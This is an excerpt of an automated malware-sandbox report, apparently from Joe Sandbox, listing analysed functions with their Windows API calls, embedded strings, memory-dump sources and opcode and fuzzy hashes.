                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule
                                                                                                                        • String ID: C$STATIC
                                                                                                                        • API String ID: 4139908857-943213032
                                                                                                                        • Opcode ID: 9571a940192283a5ca8a18aefcfacdf5720afdf396394f8a1ddef510e39c0b7a
                                                                                                                        • Instruction ID: 5096d084979fac02b0f021520fe1f54798cdb3ff5db8973b4733bd1c226e84b7
                                                                                                                        • Opcode Fuzzy Hash: 9571a940192283a5ca8a18aefcfacdf5720afdf396394f8a1ddef510e39c0b7a
                                                                                                                        • Instruction Fuzzy Hash: 3C31BC71A183049BD7049F69D8986BEBBE4FFC8314F05861EF88897251DBB09A809B91
                                                                                                                        Function 008683B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FilePointer
                                                                                                                        • String ID: SetFilePointerEx$file_io_win.cc
                                                                                                                        • API String ID: 973152223-1783654876
                                                                                                                        • Opcode ID: 920394649c297fe4aa5ea00f08f5ad6fd6b2b5798a7cbc1e534439be3fda65f0
                                                                                                                        • Instruction ID: 74941d89da847af9a77cc33858b409abbc0416aa1c1f7c0af9d79803ddb01823
                                                                                                                        • Opcode Fuzzy Hash: 920394649c297fe4aa5ea00f08f5ad6fd6b2b5798a7cbc1e534439be3fda65f0
                                                                                                                        • Instruction Fuzzy Hash: 8A218F716047549BC7209F289842B5BB7A9FBC5B14F018A29E849DB381DE70D905CBD2
                                                                                                                        Function 008BAEA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • check-the-interface, xrefs: 008BAEBA, 008BAF09, 008BAF10, 008BAF1D
                                                                                                                        • ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 008BAF74
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _strlen
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$check-the-interface
                                                                                                                        • API String ID: 4218353326-72280420
                                                                                                                        • Opcode ID: e4a66f649e0ac4b23bce63da711a9d9696df0f1ec70f1fa825d27292e513de6d
                                                                                                                        • Instruction ID: 4508c4939c9fd95a8d0b43601527a618571b74054e25851db761ca4fdc4ca466
                                                                                                                        • Opcode Fuzzy Hash: e4a66f649e0ac4b23bce63da711a9d9696df0f1ec70f1fa825d27292e513de6d
                                                                                                                        • Instruction Fuzzy Hash: 912106B1E0425A5ECB14AFB4D891BFFB7A5EF80314F160439E401E7382EB645A0487D2
                                                                                                                        Function 00840EA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • do-not-launch-browser, xrefs: 00840EBC, 00840F0E, 00840F15, 00840F22
                                                                                                                        • ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 00840F75
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _strlen
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$do-not-launch-browser
                                                                                                                        • API String ID: 4218353326-2519540672
                                                                                                                        • Opcode ID: 656b683aeb7e0cc9292e3d07b7260222b5fd8bdce30d5d18d6bb1c454cd9291d
                                                                                                                        • Instruction ID: b2ebdc442c0c4aff599d0532796185a3a064321752b88e8b143e96c2ce753514
                                                                                                                        • Opcode Fuzzy Hash: 656b683aeb7e0cc9292e3d07b7260222b5fd8bdce30d5d18d6bb1c454cd9291d
                                                                                                                        • Instruction Fuzzy Hash: B621F472D0421D9FCB20ABE8D891BEFB7A4EB54714F150439E905EB282EB745D088BD2
                                                                                                                        Function 008E2070 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • old_ver, xrefs: 008E2085, 008E20CD, 008E20D4, 008E20E1
                                                                                                                        • ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 008E2128
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _strlen
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$old_ver
                                                                                                                        • API String ID: 4218353326-2335872202
                                                                                                                        • Opcode ID: 0fc51e875b60e6f064ab7bb2586269d7df9df786a3f96e6e7df1b4813e34013d
                                                                                                                        • Instruction ID: cc67f12f856809cffd81f21bc8f3c17101054efec5256201e62fb31e8aabcc1c
                                                                                                                        • Opcode Fuzzy Hash: 0fc51e875b60e6f064ab7bb2586269d7df9df786a3f96e6e7df1b4813e34013d
                                                                                                                        • Instruction Fuzzy Hash: E9113AB2D0429D5FCB10AAE9DC92EBFB6ACEF41314F150439E910E7182EA215A45C7D2
                                                                                                                        Function 0595612E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 05956138
                                                                                                                          • Part of subcall function 0594CD2C: __EH_prolog3.LIBCMT ref: 0594CD33
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3H_prolog3_
                                                                                                                        • String ID: H8D$d
                                                                                                                        • API String ID: 3355343447-1469732128
                                                                                                                        • Opcode ID: ed6f760672945644dbb071bb63a6a800d80f77f235118752496369c542947f77
                                                                                                                        • Instruction ID: feabdeb3b0c4f349e5cf4aa827ca9f2c8310e276bfc8ca04944da5ac19551566
                                                                                                                        • Opcode Fuzzy Hash: ed6f760672945644dbb071bb63a6a800d80f77f235118752496369c542947f77
                                                                                                                        • Instruction Fuzzy Hash: 03215E71A012189FDB24FB64CD49BDD7AB8AF89300F5040E9E509A7241DB746F58CF91
                                                                                                                        Function 00834E50 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 00834EC3
                                                                                                                        • ..\..\third_party\libc++\src\include\string:953: assertion __s != nullptr failed: basic_string(const char*) detected nullptr, xrefs: 00834ECA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _strlen
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string:953: assertion __s != nullptr failed: basic_string(const char*) detected nullptr
                                                                                                                        • API String ID: 4218353326-2004309996
                                                                                                                        • Opcode ID: 0a248b1bfa77444f9b1529b10092264bc8173468dc0916fb7412f66cae2cdc0b
                                                                                                                        • Instruction ID: 9151a4b2789a9893882d3a745317ba4306ee299276e2a5a4d7c60e48cb8eb2ef
                                                                                                                        • Opcode Fuzzy Hash: 0a248b1bfa77444f9b1529b10092264bc8173468dc0916fb7412f66cae2cdc0b
                                                                                                                        • Instruction Fuzzy Hash: 640128B2B002456AD7202EA5DC81E2B77CCFFD1768F15583AF405C7281EAB1AC4083E2
                                                                                                                        Function 0594CE9C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 0594CEA6
                                                                                                                          • Part of subcall function 0594C9C3: __EH_prolog3_GS.LIBCMT ref: 0594C9CA
                                                                                                                          • Part of subcall function 0594DE14: __EH_prolog3.LIBCMT ref: 0594DE1B
                                                                                                                          • Part of subcall function 0594FA18: __EH_prolog3.LIBCMT ref: 0594FA1F
                                                                                                                          • Part of subcall function 0594FA18: _Func_class.LIBCONCRT ref: 0594FA71
                                                                                                                          • Part of subcall function 0594FA18: _Func_class.LIBCONCRT ref: 0594FAC3
                                                                                                                          • Part of subcall function 0594FA18: _Func_class.LIBCONCRT ref: 0594FAD6
                                                                                                                          • Part of subcall function 0594DAFC: __EH_prolog3_GS.LIBCMT ref: 0594DB06
                                                                                                                          • Part of subcall function 0594DA0B: _Func_class.LIBCONCRT ref: 0594DA4E
                                                                                                                        • _Func_class.LIBCONCRT ref: 0594CF4B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Func_class$H_prolog3$H_prolog3_
                                                                                                                        • String ID: ! D
                                                                                                                        • API String ID: 3328072954-586896622
                                                                                                                        • Opcode ID: 21598411db54109530d3edb8b3260081bdccbd1328aa32118fff40e5906d5dd3
                                                                                                                        • Instruction ID: 2c059cabd77472aeabd64157f07edcafc5aa5d2c0b0b82e40f67d98769dfb371
                                                                                                                        • Opcode Fuzzy Hash: 21598411db54109530d3edb8b3260081bdccbd1328aa32118fff40e5906d5dd3
                                                                                                                        • Instruction Fuzzy Hash: 77218B70D06289AEDF05DFA8C908ADDBFB09F95304F148088D44477351C7746F45CBA1
                                                                                                                        Function 0089E050 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • MoveFileExW.KERNEL32(?,00000000,00000004,?,00000000), ref: 0089E0C3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileMove
                                                                                                                        • String ID: DeleteFileAfterReboot$file_util_win.cc
                                                                                                                        • API String ID: 3562171763-2741251342
                                                                                                                        • Opcode ID: b352ebe8a52dbe7d922c4e8565eff9e28afe063549b20609805b3c440d521fbe
                                                                                                                        • Instruction ID: 6931239b0e27a76033cd6b98c7657ecb6ae3f5091f3fb97e447587a667b45a34
                                                                                                                        • Opcode Fuzzy Hash: b352ebe8a52dbe7d922c4e8565eff9e28afe063549b20609805b3c440d521fbe
                                                                                                                        • Instruction Fuzzy Hash: 45115931B04741ABEA10AF288C42B6BBB64FFC5754F104A2CF9E0971C1EBA0650486C1
                                                                                                                        Function 0089E400 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetFileAttributesW.KERNEL32(?,?,00000000,?,?,?,?,?,00000000,?,?,?,0085D5AD,?,?,?), ref: 0089E45D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AttributesFile
                                                                                                                        • String ID: DirectoryExists$file_util_win.cc
                                                                                                                        • API String ID: 3188754299-2619260668
                                                                                                                        • Opcode ID: e2f37edc10478e69bae21f963d52b7743de0c2b5aec3eab393c5c9008ec4be5d
                                                                                                                        • Instruction ID: 66683047e0ab6f543b06050d2f7039d068e3bdac42c5619f175270bcac3546ff
                                                                                                                        • Opcode Fuzzy Hash: e2f37edc10478e69bae21f963d52b7743de0c2b5aec3eab393c5c9008ec4be5d
                                                                                                                        • Instruction Fuzzy Hash: 4901F972B107456BE7106B388C8665EB764FFCA774F100B1DF9E593282FBA0655482C1
                                                                                                                        Function 0089E270 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetFileAttributesW.KERNEL32(?,?,00000000), ref: 0089E2CD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AttributesFile
                                                                                                                        • String ID: PathExists$file_util_win.cc
                                                                                                                        • API String ID: 3188754299-4095027001
                                                                                                                        • Opcode ID: 13b5aa07b37745b89ec62ec7460ff997fcc1096d6b2984538a6c18498ce28a51
                                                                                                                        • Instruction ID: d5edacbe07e05fdb5bf42dc091426c3f9114104792ad648fc5075262a2738e31
                                                                                                                        • Opcode Fuzzy Hash: 13b5aa07b37745b89ec62ec7460ff997fcc1096d6b2984538a6c18498ce28a51
                                                                                                                        • Instruction Fuzzy Hash: 26016432A103456BD710AB388C82A6FB768FFCA730F100B1DF8E2935C1FBA0A54082C1
                                                                                                                        Function 00832C20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • InitializeCriticalSectionEx.KERNEL32(009648F4,00000000,00000000), ref: 00832C64
                                                                                                                        • GetLastError.KERNEL32 ref: 00832C87
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalErrorInitializeLastSection
                                                                                                                        • String ID: MZx
                                                                                                                        • API String ID: 3413597225-2575928145
                                                                                                                        • Opcode ID: d1113f74d4fba9ee5d6236a845aef2d59889dbd0fe460b91034755b27d05cc9f
                                                                                                                        • Instruction ID: 75603bb915425724195c4e381c91635431c6980ecf31f651851578293324620b
                                                                                                                        • Opcode Fuzzy Hash: d1113f74d4fba9ee5d6236a845aef2d59889dbd0fe460b91034755b27d05cc9f
                                                                                                                        • Instruction Fuzzy Hash: 79F0B4B496C3854ED340DFB6BC0462636E8FBE5B45F54422EE804D7121E7F050C4BB51
                                                                                                                        Function 008C8670 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 008C867E
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetHandleVerifier), ref: 008C868A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                        • String ID: GetHandleVerifier
                                                                                                                        • API String ID: 1646373207-1090674830
                                                                                                                        • Opcode ID: 382a18d6ceae63ead9f4be9b5252d5afd5bd2a8f67428f6630d4b61b1115b147
                                                                                                                        • Instruction ID: 85beee2b3e70d1a86845735aa2f43dafee76bad41b57f598f98643ef407decfb
                                                                                                                        • Opcode Fuzzy Hash: 382a18d6ceae63ead9f4be9b5252d5afd5bd2a8f67428f6630d4b61b1115b147
                                                                                                                        • Instruction Fuzzy Hash: C5D017706A8304EBEE006B669D0DF32326CE71074AF404418F809D1090CF74C840AA20
                                                                                                                        Function 008584C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000002,?,00941D0E,00000002,GetInfoFromResources,0000016F), ref: 008584CA
                                                                                                                        • FindResourceW.KERNEL32(00000000,00000002,BIN,?,00941D0E,00000002,GetInfoFromResources,0000016F), ref: 008584D7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FindHandleModuleResource
                                                                                                                        • String ID: BIN
                                                                                                                        • API String ID: 3537982541-1015027815
                                                                                                                        • Opcode ID: b9d0b18dcd3e7804b2e6f93702c7886fa48bdb255e94d3fa891dc19bd5981c41
                                                                                                                        • Instruction ID: cdb9404c1af79640b9d46b01209488ca201e093bf7f7d56c45002c551e10a41f
                                                                                                                        • Opcode Fuzzy Hash: b9d0b18dcd3e7804b2e6f93702c7886fa48bdb255e94d3fa891dc19bd5981c41
                                                                                                                        • Instruction Fuzzy Hash: 41C0122226532477C6003BE7EC0FFDB3A5C9B05A67F008011FA0CD1190D7A0945057E0
                                                                                                                        Function 008CC620 Relevance: 5.1, APIs: 4, Instructions: 96COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(?,00000000,00000000,?,008CC615,?,?,?), ref: 008CC694
                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 008CC6C9
                                                                                                                        • GetLastError.KERNEL32(?,00000000,00000000,?,008CC615,?,?,?), ref: 008CC6DC
                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 008CC715
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
